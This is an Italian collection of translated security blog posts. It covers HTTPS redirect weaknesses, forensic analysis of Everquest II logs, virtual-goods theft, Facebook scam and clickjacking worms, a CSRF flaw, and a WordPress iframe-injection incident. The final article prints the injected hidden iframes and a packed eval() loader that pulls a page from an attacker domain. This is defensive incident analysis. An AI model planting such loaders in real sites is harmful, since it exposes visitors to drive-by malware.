Una veloce riflessione, durante un venerdì pomeriggio. Per un po’ ho chiesto ad amici, parenti e alla gente comune non dedita all’hardcore security, come si colleghino alla propria banca. Di seguito sono riportati i tipi di risposte che ho avuto:

• “scrivo www.bank.com”.
• “scrivo ‘banca’ e premo ctrl-enter”
• “scrivo http://www.bank.com”
• “scrivo bank.com e premo Invio”

Quasi mai (solo due volte su dozzine di persone) ho sentito dire: “scrivo https://www.bank.com”, con la “s”. Quindi cerchiamo di pensare, solo per un secondo, a tutte queste persone. Prendiamo “bank.com” come esempio.

• L’utente scrive bank.com e, a seconda del browser, il comando viene inviato via cavo non appena il completamento automatico abbia inserito HTTP.
• Il browser corregge l’URL di http://bank.com/ e fa una richiesta al DNS per “bank.com”.
• Il server DNS risponde con un indirizzo IP.
• L’utente effettua una richiesta all’indirizzo IP di bank.com su HTTP.
• bank.com risponde con HTTP in chiaro ai browser degli utenti, li informa che dovrebbero essere collegati a www.bank.com e li reindirizza tramite un redirect 301 o 302.
• Il browser dell’utente fa un’altra richiesta DNS a www.bank.com.
• Il server DNS risponde con l’indirizzo IP di www.bank.com.
• Il browser effettua una connessione HTTP a www.bank.com
• www.bank.com si rende conto che l’utente si connette via HTTP e usa un altro redirect per reindirizzare l’utente a https://www.bank.com (o spesso, tramite un link presente nella pagina, si chiede all’utente di autenticarsi tramite HTTPS)
• Il browser dell’utente si ri-connette alla porta 443 e comincia a negoziare – e a questo punto è cifrato (si spera con crittografia avanzata e che non ci siano altri problemi …)

Ci sono un sacco di punti in cui un utente malintenzionato potrebbe inserirsi e combinare pasticci. Quindi, anche se usare l’HTTPS è una buona idea, in pratica, è come le persone ci arrivano che è discutibile. La promessa di STS, HTTPS everywhere e di alcune impostazioni all’interno di NoScript, ecc…; erano di toglierlo dalle mani dell’utente.
Non che queste non siano buone idee, ma ci sono problemi di usabilità e l’utente dovrebbe essere, nella maggioranza dei casi, in qualche modo informato: cosa che, generalmente, non accade.

Fonte: Places to MITM

Massively Multiplayer Online Role Playing Game, un vero scioglilingua, così molte persone lo abbreviano con una sigla, MMORPG.

Un po’ di storia per chi non gioca online. MMORPG è solo un “gusto” tra i molti tipi di giochi online. Gli MMORPG includono giochi come World of Warcraft, The Sims Online, Everquest, Everquest II, Second Life, Age of Conan, Hello Kitty Adventure Island, Free Realms e molti altri.

Tuttavia tale elenco non comprende altri tipi di giochi on-line, come Party Poker, Red Baron, Call of Duty, Enemy Territory, Quake e tanti altri, ma non posso elencarli tutti qui.

Attualmente ci sono oltre centocinquanta di questi giochi, usati da milioni di persone in tutto il mondo e ci sono oltre un centinaio di nuovi giochi attualmente in sviluppo per il rilascio nei prossimi due anni. ¹

Questi giochi hanno come target anche un pubblico di soli bambini, ad esempio Free Realms, Hello Kitty Adventure Island e altri. Da giocare su personal computer, Playstation, console X-Box e anche sui telefoni cellulari.

I giochi online hanno raggiunto un livello di popolarità tale che, prima o poi, sarà più che probabile incontrare questo tipo di prova in un caso. Soltanto World of Warcraft vanta milioni di abbonati. E questo è solo un gioco tra le decine di titoli.

Ovunque le persone si aggreghino e interagiscano nel corso del tempo, ci saranno crimini o una qualche forma di cattivo comportamento. Una veloce ricerca su Google mostrerà dozzine di storie dove le persone vengono accusate di commettere crimini nel mondo reale e dove uno di questi giochi ha svolto una parte.

Ecco solo alcune di quelle notizie :

Secondo la notizia riportata dalla Fox ” Una mamma di Houston è accusata di aver adescato un ragazzo canadese, allora quindicenne, e aver avuto una relazione sessuale dopo averlo “incontrato” sul gioco online World of Warcraft.

Lauri Price, 42 anni, a quanto pare è andata oltre. Ha deciso che sarebbe volata in Canada per avere rapporti con il ragazzo al compimento dei suoi 16 anni, per aggirare le leggi sullo stupro degli Stati Uniti. (In Canada, l’età del consenso è 16.) “ ²

“Una coppia sud-coreana, venerdì, è stata dichiarata colpevole di omicidio colposo, visto che la figlia di tre mesi è morta per denutrizione mentre stavano crescendo un bambino virtuale in un gioco online “. ³

“Una donna di Portland che ha incontrato un ragazzo di 14 anni del Tennessee durante il gioco online ‘World of Warcraft’, è accusata di averlo coinvolto in chat sessuali ed aver scambiato foto esplicite.” ⁴

“Portland, Oregon – L’ufficio del Multnomah County Sheriff ha avviato un’indagine in merito alle accuse contro un rappresentante dell’istituto correzionale locale, che si vantava in una chat room su Internet di aver usato un taser su alcune persone .

“Il luogt. Jason Gates dell’Ufficio del Multnomah County Sheriff, si è detto costernato per i presunti commenti online dell’ufficiale dell’istituto correzionale della contea.

Secondo Gates, Thompson ha utilizzato un computer della contea per giocare con il videogioco online ‘City of Heroes’, mentre era al lavoro; successivamente si è vantato nella chat room della gioia che provava nel provocare dolore alle persone in carcere.

“Budnick ha detto che, secondo la chat online Trafalgar, il rappresentante ha pubblicato, da gennaio, più di 1700 messaggi sul sito web di ‘City of Heroes’ . Ad un certo punto avrebbe, presumibilmente, inviato 64 messaggi in 24 ore “. ⁵

Le persone sono persone e quando interagiscono tra loro, gli affari online e altre relazioni possono venire a galla. Alcune persone diventano dipendenti da questi giochi e giocano molte, molte ore a settimana, a volte escludendo ogni altra cosa della loro vita.

Nei giochi online l’unica descrizione che si possa ottenere è il suo avatar e le chat, siano esse composte di testo o vocali.
È facile per una persona legarsi ad un altro personaggio online. E quel personaggio può essere creato interamente per adattarsi alla persona che l’ha creato, qualsiasi sia il motivo che l’abbia spinta a farlo.

Siate consapevoli che i predatori di bambini considerano questi giochi luogo ideale per trovare potenziali vittime.

Vi state occupando di un caso d’incuria infantile? I log dei giochi potrebbero mostrare ciò che la persona stava facendo invece di prendersi cura di un bambino

I log del gioco potrebbero rivelare una connessione con qualcuno che potrebbe aiutare a risolvere un caso di persone scomparse?

La presenza di un gioco potrebbe portarvi a cercare altre informazioni come le iscrizioni a forum e messaggi?

I dati sono ovunque. Non tutti sono importanti, l’unico modo per saperlo è guardare. Non ignorate possibili prove solo perché si tratta di un gioco.

Un’analisi inerente la forensics di Everquest II

La maggior parte di questi giochi tiene un log delle attività. Oltre ai log automatici, molte volte i giocatori terranno file di log supplementari impostati durante il gioco.

Inoltre, all’interno dei file nella directory del programma, troverete i nomi degli account del giocatore e dei personaggi (avatar) con i quali giocano.

Everquest II salva anche un piccolo e pratico file che memorizza i comandi più recenti inviati dal giocatore al gioco. Il giocatore non ne è consapevole dal momento che non ne ha alcun controllo.

La maggioranza di questi log, generati automaticamente, contengono data e time stamps, quindi, anche se la data e l’ora del file venissero modificate, il time stamp originale potrebbe essere ancora nel log in modo da poter esser recuperato.

Everquest II conserva un log di quando il gioco è stato installato, quando è stato effettuato l’ultimo accesso, e la durata delle sessioni. Analizzando tutti i log, è possibile determinare i tempi delle sessioni di gioco e le date .

Se il giocatore ha attivato il logging in-game, si avrà un vero e proprio tesoro di informazioni. Il logging in-game memorizza tutto ciò che il giocatore digita nel gioco, i time stamp, così come tutto ciò che chiunque altro, durante il gioco, digiti in un messaggio al giocatore.

Analizzando i file di log in-game, è possibile stabilire le date, gli orari delle sessioni di gioco e la durata di ogni sessione.

E naturalmente tutte le conversazioni che la persona ha effettuato durante il gioco, se è stata utilizzata l’interfaccia di gioco per effettuare la chat tramite la tastiera.

Tuttavia, tenete presente che molti giocatori utilizzano la chat vocale per parlare direttamente con altre persone nel gioco utilizzando microfono e auricolare. Tali conversazioni non vengono memorizzate, a meno che non partecipiate alla conversazione e abbiate un sistema per registrare l’audio.

Tutti i file analizzati in questo articolo si trovano nella directory di Everquest II o nella directory station.

Trovare i nomi degli account dei giocatori e i personaggi

Il file Station Launcher Properties.ini, contiene un elenco di tutti gli account utente che sono stati utilizzati sul computer.

L’install-location.xxxxxxxxxxx.eq2-live conterrà il nome dell’account del giocatore al posto della stringa di X. Ho modificato i nomi di account reali in questo esempio. Quello che compare è il nome dell’account reale di un giocatore per accedere al gioco e non il nome del personaggio.

Figura 1 – Station Launcher Properties.ini

Utilizzando le informazioni del file precedente, è possibile individuare un particolare nome account e aprire il file xxxxxxxxxxx_characters.ini per vedere i nomi dei personaggi attivi per quell’account.

Ricordate che xxxxxxxxxxx sarebbe in realtà il nome di un account.

Figura 2 – file dell’account che contiene i nomi dei personaggi

All’interno del file xxxxxxx_characters.ini troverete il nome del personaggio e il server di SONY in cui trovarlo.
I nomi dei personaggi sono univoci ma dipendono dal server in cui si trovano, non sono validi per l’intero gioco.

Figura 3 – i nomi dei personaggi relativi all’account selezionato

Inoltre il file eq2_recent.ini, memorizza gli ultimi account che abbiano effettuato l’autenticazione. In questo caso ho modificato il nome dell’account e l’ho sostituito con le x. Sarà possibile vedere anche il nome dell’ultimo server a cui si è collegato il giocatore.

Figura 4 – Gli ultimi account autenticati

Trovare l’elenco amici di un account

È possibile individuare l’elenco degli amici di un personaggio aprendo il file Server_CharacterName_eq2_notes.txt

CharacterName sarebbe il nome del personaggio utilizzato .

Figura 5 – Lista amici di un personaggio

Log di connessione giornalieri

Ogni volta che un giocatore accede a Everquest II viene creato un log di connessione giornaliero. Viene creato un solo log al giorno, quindi se il giocatore ha più sessioni, saranno memorizzati nel log di quel giorno. Questi file si trovano nella sottodirectory del log.

Figura 6 – Log di connessione giornalieri

Il time stamp per il log di connessione giornaliero, è rappresentato dalla durata della prima sessione per quel giorno.

Figura 7 – Un log di connessione giornaliero

Nel log di connessione giornaliero, visualizzato tramite WordPad, si può vedere la fine delle sessioni di gioco per quel giorno.

Analisi dei file di log

Se l’utente ha attivato il logging nel gioco, Everquest II terrà log ampi e dettagliati di tutto ciò con cui il giocatore entrerà in contatto, incluse tutte le chat private. Nel gioco una chat privata viene attivata dal comando /tell. Per individuare i file di log di un personaggio particolare, si naviga fino alla sottodirectory dei log, quindi alla sottodirectory del server e infine al file di log del gioco.

Figura 8 – Cartelle dei log dei server

Una volta all’interno della sottodirectory del server, potrete vedere una lista di tutti i file di log per quel determinato server.

Figura 9 – File di log nella directory del server Unrest

Questi file di log possono essere molto grandi e contenere una grande quantità di informazioni non rilevanti dal punto di vista di un’analisi inerente la forensics.

Analisi dei log in Microsoft Access

Nel formato raw, i file di log sono difficili da leggere.

Figura 10 – File di log visualizzato tramite WordPad

Il modo più semplice per analizzare i file di log ed estrarre le informazioni desiderate durante un’analisi relativa alla forensics, è importare il file di testo in un database di Access. Ecco i passaggi per importare e poi analizzare i file di log mediante le query di Access.

Fase 1: Aprire MS Access e selezionare Carica dati esterni – Importa

Figura 11 – Fase 1

Fase 2: Individuare il file di log che si desidera importare in Access

Figura 12 – File di Log

Fase 3: Avviare il processo di importazione

Poiché il log può contenere punteggiatura, il metodo migliore è quello di importare i log con larghezza fissa.

Figura 13 – La finestra Importazione guidata Testo

Fase 4: Le linee con le frecce verso l’alto sono situate dove la procedura guidata pensa che il campo debba essere diviso. Con il doppio clic sulla freccia all’estrema sinistra, si rimuoverà l’interruzione di campo. Questo permetterà d’includere l’anno nel campo del time stamp. Si veda la Figura 15 per la fase completa.

Figura 14 – Finestra di dialogo dell’interruzione di campo per l’Importazione guidata Testo

Figura 15 – Importazione guidata testo con interruzione di campo rimossa

Fase 6: Completare il processo di importazione, fare clic su Fine per importare i file di log in una nuova tabella.

Figura 16 – Importare il file di log in una nuova tabella

Creazione query per analizzare il file di log

Fase 1: In Access, selezionare il menu Query e fare clic su Crea query in visualizzazione Struttura.

Fase 2: Selezionare la tabella creata quando avete importato il file di log e fare clic su Aggiungi.

Figura 17 – Selezionare la tabella creata dal file di log

Fase 3: Trascinare i campi nella griglia del riquadro inferiore della finestra Crea query.

Figura 18 – Trascinare i campi nella griglia query

A questo punto se si esegue la query, si dovrebbero vedere i dati nella vista seguente:

Figura 19 – Vista query iniziale

Fase 4: Aggiungere una descrizione alle intestazioni delle colonne. Per aggiungere una descrizione, fare clic sul nome del campo e digitare ciò che si desidera visualizzare come nome della colonna. Ad esempio Time Stamp:. I due punti sono necessari per comunicare ad Access che si sta mettendo un’etichetta nel campo.

Figura 20 – Query con descrizioni

Figura 21 – Vista Query dopo inserimento nomi intestazioni

Fase 5: Aggiungere il campo ID trascinandolo nella griglia. Il campo ID viene creato automaticamente da MS Access ed è un campo Contatore.

Figura 22 – aggiungere il campo ID per la query

Figura 23 – Vista query con il campo ID

Il motivo per cui vogliamo il campo ID nella query, è per poterla tracciare a livello di forensics. Se si tenta di eliminare un record, anche l’ID (3 in questo caso) viene eliminato. Non è possibile modificare manualmente il campo contatore, così ogni eliminazione sarebbe verificata dall’ID mancante .

Figura 24 – L’eliminazione di un record, ne elimina anche l’ID.

Analisi del file di log in base a Criteri

Per analizzare le informazioni desiderate dal log, inserire i criteri di selezione al campo testo del log. In questo caso, è necessario aggiungere due criteri: uno per le chiamate inviate da parte dell’utente e uno per le chiamate ricevute.
In MS Access, la parola chiave “Like” dice al motore del database di trovare qualunque cosa sia “simile” alla ricerca inserita. Gli asterischi dicono al motore di individuare qualsiasi cosa, presente prima e dopo la ricerca.

Figura 25 – Criteri per effettuare il parse di chiamate private

Figura 26 – Query effettuate tramite parse per chiamate in entrate e in uscita

Per conoscere i tempi di connessione e disconnessione dell’utente, inserire i criteri che segnalino quando il personaggio sia connesso o disconnesso. Per EverQuest II, l’inizio di una sessione inizia con l’avviso che il logging è stato attivato e termina con la parola chiave “camp”.

Figura 27 – Criteri per l’inizio e la fine della sessione

Figura 28 – Vista query che mostra inizio e fine di una sessione

Altre informazioni

Everquest contiene anche un file chiamato eq2cmdhistory.txt. Questo file memorizza gli ultimi trenta comandi digitati dal giocatore. Dato che /tell o la chat privata sono comandi, questo file memorizza tale attività. Tuttavia, in questo modo, si potrà ottenere soltanto una parte di una conversazione .

Figura 29 – Posizione del file eq2cmdhistory.txt

La figura sotto mostra il contenuto del file eq2cmdhistory.txt. Si noti il comando /tell e il testo che lo segue. Mentre il file non memorizza internamente nessuna informazione relativa alla data o l’ora, la sua variazione della data viene aggiornata per ogni sessione di gioco.

Figura 30 – Contenuto del file eq2cmdhistory.txt

Everquest II ha anche la funzionalità di browser in-game. È possibile trovare la cronologia del browser in-game nella cartella Mozilla.

Figura 31 – Cronologia browser in-game

Come ottenere ulteriori informazioni

Sony Online Entertainment conserva log dettagliati, lato server, per ogni personaggio e account. Dovreste essere in grado di ottenerli tramite i custodian of records. Il loro indirizzo aziendale è Sony Online Entertainment LLC, 8.928 Terman Ct., San Diego, CA 92121.

Sitografia:

1. MMORPG.com – Your Headquarters for Online Multiplayer Games, RPG Online Games, Online Role Playing Free Games! Web. 15 May 2010. www.mmorpg.com.
2. “Houston Mom Accused of Luring Teen for Sex through Online Game? Moms At Work? Orlando Sentinel.” Orlando Sentinel Blogs – OrlandoSentinel.com. Web. 15 May 2010. blogs.orlandosentinel.com/features_momsatwork/2010/01/houston-mom-accused-of-luring-teen-for-sex-through-online-game.html.
3. “Couple: Internet Gaming Addiction Led to Baby’s Death – CNN.com.” CNN.com – Breaking News, U.S., World, Weather, Entertainment & Video News. Web. 15 May 2010. www.cnn.com/2010/WORLD/asiapcf/04/01/korea.parents.starved.baby/index.html.
4. “Portland Woman Accused of ‘World of Warcraft’ Chat with Boy That Turned Sexual | OregonLive.com.” Oregon Local News, Breaking News, Sports & Weather – OregonLive.com. Web. 15 May 2010. www.oregonlive.com/portland/index.ssf/2010/03/portland_woman_accused_of_worl.html.
5. “Officer Accused Of Bragging Online About Using Taser Gun – Portland News Story – KPTV Portland.” Portland News, Oregon News and Local Weather from KPTV FOX 12 News. Web. 15 May 2010. www.kptv.com/news/14065232/detail.html.

Larry E. Daniel è consulente informatico e consulente per la mobile forensics, lavora con clienti in tutti gli Stati Uniti per gestire qualsiasi tipo di causa civile e penale. Ha testimoniato come esperto di computer forensics in diversi casi, in vari stati.
Larry è membro dell’ American College of Forensic Examiners ed è presidente dell’ Ethics Committee for the American Society of Digital Forensics and eDiscovery. Larry è CEO di Guardian Digital Forensics, Digital Forensics Certified Practitioner, autore del popolare blog sulla digital forensics, Ex Forensis, e conduttore dello show radiofonico Forensics Internet.

Fonte: Multiplayer Game Forensics

In Finlandia, la polizia ha, a quanto si dice , perquisito case in cinque città e sequestrato materiale informatico alla ricerca di oggetti rubati da un mondo virtuale.

I mobili virtuali dell’Habbo Hotel, conosciuti dai giocatori come “furni”, vengono acquistati con crediti e scambiati nelle community online per arredare le camere d’albergo virtuali. I crediti sono acquistati dai membri con denaro reale.

Secondo il sergente Marko Levonen, le autorità finlandesi stanno esaminando fino a 400 casi di furto. Alcuni giocatori di Habbo Hotel hanno segnalato di aver perso fino a 1000 euro in controvalore di mobili virtuali.

Gli hacker, grazie a pagine di phishing e a spyware keylogging, sono in grado di rubare nomi utente e password dei giocatori online, rubare i loro beni virtuali e rivenderli ad altri.

Potrebbe sembrare futile lamentarsi di qualcosa che è stato rubato e che non è mai esistito fisicamente; ma ricordatevi che questi mobili virtuali sono stati acquistati con denaro reale.

E questa non è la prima volta che le autorità hanno indagato su furti dall’hotel virtuale.

Già nel 2007 abbiamo riferito di come la polizia olandese abbia arrestato un adolescente di 17 anni con l’accusa di aver rubato quasi $6000 in controvalore di mobili virtuali , dagli utenti dell’ Habbo Hotel.

Che giochiate online, o facciate online banking, è sempre necessario mantenere alta l’attenzione nella vostra mente e la sicurezza del vostro nome utente e password, per difenderle da hacker ficcanaso.

Fonte: Police search for stolen virtual furniture from Habbo Hotel

Migliaia di utenti Facebook stanno segnalando di esser stati colpiti da un attacco malware che utilizza un video con giovani donne in bikini su una spiaggia.

I messaggi vengono pubblicati sulla bacheca dei membri di Facebook, con un thumbnail del fondoschiena di una giovane donna in bikini.

I messaggi sono i seguenti:

<name>, this is hilarious! lol Distracting Beach Babes [HQ] Length: 5:32

Lo scam di “Distracting Beach Babes” sembra essere l’ultima incarnazione del maggiormente noto “Sexiest Video Ever”, attacco compiuto via Facebook lo scorso fine settimana e che, grazie all’installazione di adware sul computer della vittima, permetteva agli hacker di guadagnare bene.

Non dovreste avere dubbi su quanto sia efficace un metodo del genere. Molti utenti Facebook sono fin troppo abituati a ricevere video lascivi e link divertenti dagli amici e a far clic su di essi senza riflettere. Purtroppo questo potrebbe scatenare un bombardamento di messaggi dannosi verso i propri contatti del social networking. Vorreste davvero che un blitz del genere venisse scatenato a vostro nome?

Fortunatamente, alcuni utenti di Facebook utilizzano questo media per segnalare la minaccia:

Se siete stati colpiti, dovreste eliminare il messaggio incriminato dalla vostra pagina, controllare il computer con un antivirus aggiornato, cambiare le password e rivedere le impostazioni delle applicazioni di Facebook.

Inoltre, imparate una lezione importante: non siate così veloci a fare clic su link non richiesti, o ad approvare applicazioni sconosciute per il futuro.

Ma cosa ancora più importante, dite ai vostri amici di fare lo stesso.

Sto cominciando a chiedermi se i cibercriminali lancino deliberatamente queste campagne nei fine settimana, forse credono che i ricercatori nell’ambito degli antivirus e lo stesso team di sicurezza Facebook stiano sonnecchiando?

Se siete utenti regolari di Facebook, perché non iscrivervi alla fan page di Sophos su Facebook ?

Faremo del nostro meglio per garantire che siate costantemente aggiornati con le ultime notizie sulla sicurezza.

Fonte: Distracting Beach Babes video attack hits Facebook users

Oggi, un worm che sfrutta il clickjacking, si è diffuso rapidamente via Facebook, per indurre gli utenti a pubblicarlo tramite gli aggiornamenti di stato.

Il worm, soprannominato Fbhole a causa del dominio a cui punta, invia un messaggio simile al seguente:

Try not to laugh xD http://www.fbhole.com/omg/allow.php?s=a&r=<random number>

Il clic sul link visualizza un falso messaggio di errore che, grazie ad un exploit clickjacking, costringe l’utente a premere un pulsante invisibile, pubblicando lo stesso messaggio sul proprio stato di Facebook.

Abbiamo visto alcuni casi di clickjacking sfruttati dagli hacker in occasione di altri attacchi contro le reti sociali, ad esempio nell’ attacco “Don’t click” su Twitter , all’inizio del 2009.

La buona notizia è che è effettivamente tale. Contrariamente all’attacco “Don’t click” di Twitter, sembra che quest’ultimo allarme di sicurezza su Facebook sia stato motivato più dal crear guai che dal denaro.

Maggiori informazioni sull’attacco si possono trovare sul blog dei nostri amici di F-Secure .

Mikko Hypponen, di F-Secure, racconta di aver telefonato al numero associato al sito fbhole.com e che quest’ultimo sia stato messo off-line 15 minuti dopo. Ottimo, Mikko.

Dovremmo esser sorpresi da questo ultimo attacco via Facebook? Non penso proprio.

Una delle conclusioni principali del Sophos Threat Report 2010 è lo stupefacente aumento del 70% nelle segnalazioni di attacchi malware tramite le reti sociali. Facebook, in particolare, è stata nominata la rete sociale più rischiosa tra tutti i partecipanti .

(Vi è piaciuto questo video? Potete trovarne altri su SophosLabs YouTube channel e iscrivetevi, se volete )

Se sei un fan di Facebook, potresti volerti iscrivere alla pagina di Sophos e assicurarti di essere sempre aggiornato con le ultime notizie sulla sicurezza.

Fonte: Try not to laugh xD: Worm spreads via Facebook status messages

Un ricercatore ha scoperto una vulnerabilità critica su Facebook che potrebbe essere sfruttata dagli hacker per rivelare informazioni sensibili degli utenti.

MJ Keith, senior security analyst dell’azienda specializzata in sicurezza Alert Logic, ha scoperto la vulnerabilità che potrebbe rivelare informazioni private, o permettere che alcune pagine degli utenti Facebook siano oggetto di defacing.

Il reporter Robert McMillan, di IDG security, ha spiegato molto bene il problema :

Il bug ha a che fare con il modo in cui Facebook effettua la verifica per assicurarsi che i browser che si connettono al sito siano realmente quelli che sostengono di essere. I server di Facebook utilizzano il codice chiamato "post_form_id" token per controllare che il browser che tenta di fare qualcosa - esprimere il gradimento per un gruppo, ad esempio - sia realmente il browser che ha effettuato l'accesso all'account. I server di Facebook controllano questo token prima di apportare modifiche alla pagina dell'utente ma Keith ha scoperto che semplicemente eliminando il token dai messaggi, avrebbe potuto cambiare molte impostazioni su qualsiasi account Facebook.

Questo si chiama CSRF (Cross-site request forgery attack), se lasciato senza patch, permetterebbe agli hacker di creare pagine web dannose che potrebbero inviare istruzioni all'account della vittima senza essere autenticati.

La conseguenza? Beh, un hacker potrebbe rendere pubbliche quelle che, finora, erano informazioni private, o forzare il tuo profilo a farsi "piacere" un gruppo che potrebbe risultare imbarazzante.

MJ Keith riferisce sul sito di Alert Logic di aver informato Facebook del problema l'11 maggio e che il problema è stato risolto.

Tuttavia IDG ha riferito che la vulnerabilità è ancora presente.

Speriamo che, se non ancora corretta, questa vulnerabilità relativa alla privacy - che giunge in un momento imbarazzante per Facebook - venga rimossa al più presto.

Se sei un utente abituale di Facebook, potresti fare ancora di più e iscriverti alla pagina di Sophos sul sito per essere sempre aggiornato con le ultime notizie sulla sicurezza.

Ah, e ricordati di stare attento a fare clic su link sospetti ...

Fonte: Embarrassing privacy flaw found on Facebook

Leanne, membro della fan page di Sophos su Facebook, mi ha contattato oggi per chiedermi in merito ad alcuni video pubblicati automaticamente sui profili degli utenti, dal titolo “The sexiest video ever” ( Il video più sexy di sempre ).

Una piccola ricerca ha rivelato che migliaia di utenti si son svegliati con alcuni messaggi sul loro wall, apparentemente inviati dai loro amici di Facebook.

Il messaggio è il seguente:

<nome> this is without doubt the sexiest video ever!

C’è anche un video dal titolo "Candid Camera Prank [HQ]" . Il messaggio sembra essere un thumbnail del video di una donna in bicicletta con una gonna corta. La durata del video pare sia di 03:17.

Probabilmente sarete soliti condividere e ricevere video come questo con i vostri compagni online. Posso certamente immaginare che parecchi sarebbero tentati di riprodurre il video. Ognuno è padrone di farlo. In questa occasione, però, si dovrebbe essere estremamente prudenti; visto che se si fa clic sul thumbnail non si riproduce il video, ma si viene rediretti a un’applicazione di Facebook.

Ho tentato personalmente ma l’applicazione non è stata eseguita (forse Facebook ha già provveduto diversamente?). Secondo quanto riferito dagli utenti, l’applicazione avverte che il player video non è aggiornato e si viene invitati a scaricare un file.

Gli utenti riferiscono anche che lo stesso video è stato inviato (utilizzando l’avatar e il nome, come se lo avessero inviato personalmente) ad amici e conoscenti di Facebook, in modo da poterlo diffondere ancora più velocemente.

A giudicare dal numero di messaggi postati su Facebook, migliaia di persone sono state vittime di questo attacco.
Se foste uno di loro, sarebbe necessario controllare il computer con un antivirus aggiornato, cambiare le password, rivedere le impostazioni delle applicazioni Facebook e imparare a non abboccare a un semplice trucco di social engineering come questo, in futuro.

Aggiornamento Patrik Runald, uno dei nostri amici di Websense Security Labs, ha pubblicato questo video che mostra l’attacco.

Patrik è riuscito a catturare l’attacco mentre stava avvenendo, inoltre ha scoperto che, a parte propagarsi, è stato progettato per installare l’adware Hotbar per aumentare i profitti dei cattivi.

Se usate regolarmente Facebook, perché non iscrivervi alla pagina di Sophos su Facebook?.

Faremo del nostro meglio per garantire che siate sempre aggiornati sulle ultime notizie relative alla sicurezza.

Fonte: The sexiest video ever? Facebook users hit by Candid Camera Prank attack

Ho notato questo iframe nascosto hxxp://networkads .net/ grep/ il 7 aprile.

Subito hanno attirato la mia attenzione questi strani script “iframe_style” nei report di Unmask Parasites (ho anche pensato fosse un bug in Unmask Parasites, ma controllando il sito infetto ho trovato gli stessi script).

Tuttavia è stato un incidente isolato e non ho notato alcun pattern evidente. Due giorni dopo, quando ho notato l’ articolo di David (Sucuri Security) su questo argomento e il follow-up di Brian Krebs, ho deciso di dare un’occhiata più da vicino.

Quello che ho trovato è molto interessante e solleva alcune domande serie in merito alla sicurezza dei siti web sui server condivisi.

Un breve riassunto degli articoli di David e Brian

1.Numerosi blog con WordPress sono stati recentementi violati. Qualcuno ha iniettato l’iframe che inserisce il seguente contenuto dannoso dai server di networkads .net

<iframe style="display:none" height="0" width="1" src="hxxp://networkads .net/ grep/"></iframe>

2. L’injection è stata fatta tramite database di WordPress. Gli hacker hanno sostituito il valore dell’opzione siteurl del database wp_options (il prefisso della tabella può essere diverso nel vostro caso) con il codice iframe:

<iframe style=\"display:none\" height=\"0\" width=\" 1\" src=\"hxxp://networkads .net/ grep/\"></iframe>'

3. Questa modifica silente dei parametri siteurl, ha violato la maggior parte dei blog (sia visivamente che funzionalmente); in quanto ci sono molte dipendenze dal parametro siteurl in WordPress. Così i webmaster dovranno ripristinare manualmente il valore di questo parametro per l’URL del sito nei loro database MySql (che dovrebbe essere qualcosa del tipo: http://yoursite.com/blogroot).

4. Tutti i siti interessati sono ospitati da Network Solutions.

Le mie scoperte

Ricerche Google

La violazione spezza il codice html. Questa è una linea tipica del linguaggio html, interrotta da questa iframe injection:

<link rel="pingback" href=""><iframe style="display: none" height="0" width="1" src="hxxp://networkads .net/ grep/"></iframe>/xmlrpc.php" />

Poiché la maggior parte dei temi Wordpress utilizza attivamente il parametro siteurl nella sezione dell’ html, questo codice spezzato li fa assomigliare a questo:

ciò permette di creare una query di ricerca di Google che restituirà i blog similmente violati. Per esempio: wp-content text/css media screen xmlrpc.php -pingback questa ricerca produce circa 5.000 risultati .

Molti puntano ai blog violati. Questi 5.000, naturalmente, includono pagine indicizzate più volte dagli stessi siti; ma ho potuto trovare facilmente più di 60 blog infetti nelle prime 10 pagine dei risultati della ricerca. ( Attenzione: molti blog sono ancora infetti al momento in cui scrivo.)

Soltanto Network Solutions

Tutti questi blog sono ospitati da Network Solutions. Non un solo sito infetto è al di fuori della loro rete. Ciò significa che questo particolare attacco è limitato ai server di Network Solutions.

Ip dei server

La maggior parte dei blog infetti ( 40 e più ) si trovano sul server con indirizzo IP: 205.178.145.65

Ho trovato anche blog infetti con le stesse modalità in più di 16 Ip di Network Solutions :

205.178.145.85
205.178.145.86
205.178.145.99
205.178.145.105
205.178.145.116
205.178.189.131
206.188.192.204
206.188.193.32
206.188.193.63
206.188.193.63
206.188.193.64
206.188.193.179
206.188.193.195
206.188.193.220
206.188.193.250
206.188.196.127
206.188.211.27


La violazione non riguarda solo il database

Questo attacco non solo inietta il codice iframe nel database Wordpress, in alcuni siti gli hacker iniettano il codice iframe (leggermente modificato) direttamente nei file sui dischi.

<iframe frameborder="0" onload=' if (!this.src){ this.src="http://networkads.net/grep/"; this.height=0; this.width=0;} '></iframe>

I luoghi dell’injection suggeriscono che il codice non sia stato preso dal database.

Domini diversi

networkads .net non è stato l’unico nome di dominio usato da questo attacco. Prima gli hacker utilizzavano binglbalts .com e ora usano mainnetsoll .com/ .

Tre domini che puntano allo stesso server con indirizzo 64.50.165.169 (Lunar Pages), che sembra essere un server dedicato violato (o server virtuale dedicato), con diversi siti legittimi.

Secondo whois:

• binglbalts .com creato il 1 aprile 2010
• networkads .net creato il 4 aprile 2010
• mainnetsoll .com creato il 10 aprile 2010

Contrariamente a questo breve storico, secondo il database di Google Safe Browsing, binglbalts. com e networkads.net hanno già modificato numerosi server su 3 network differenti.

Aggiornamento: script offuscato

Quando ho pubblicato questo articolo, ho verificato i siti compromessi ancora una volta e ho scoperto questo script offuscato su uno di loro:

e v a l(function(p, a, c, k, e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('h f(a,8,d){6 3=i m();3.l(3.k()+(d*n));6 5="; 5="+3.j();4.9=a+"="+8+5+"; "}6 c=4.9;b(c.v("g")==-1){4.o(\'<e w="0" y=\\\' b (!2.7){ 2.7="t://u.p/q/"; 2.r=0; 2.s=0;} \\\'></e>\');f("g","1",x)}',35,35,'||this|date|document|expires|var|src|value|cookie|name|if||hours|iframe|addCookie|seref|function|new|toGMTString|getTime|setTime|Date|3600000|write|com|grep|height|width|http|mainnetsoll|indexOf|frameborder|24|onload'.split('|'),0,{})) ;

Era subito dopo il tag <body>.

Questo script verifica la presenza di un cookie chiamato seref. Se tale cookie non è presente, inietta un iframe nascosto proveniente da hxxp://mainnetsoll.com/ e imposta questo cookie seref per un giorno.

Come si può vedere l’attacco evolve costantemente e questa volta il codice dannoso viene iniettato direttamente in un file di WordPress.

Altre violazioni

Sembra che questi ultimi iframe injection non sia la prima volta che vengano usati per attaccare i blog WordPress sui server di Network Solutions. I segni di altri attacchi sono ancora visibili.

Hidden links

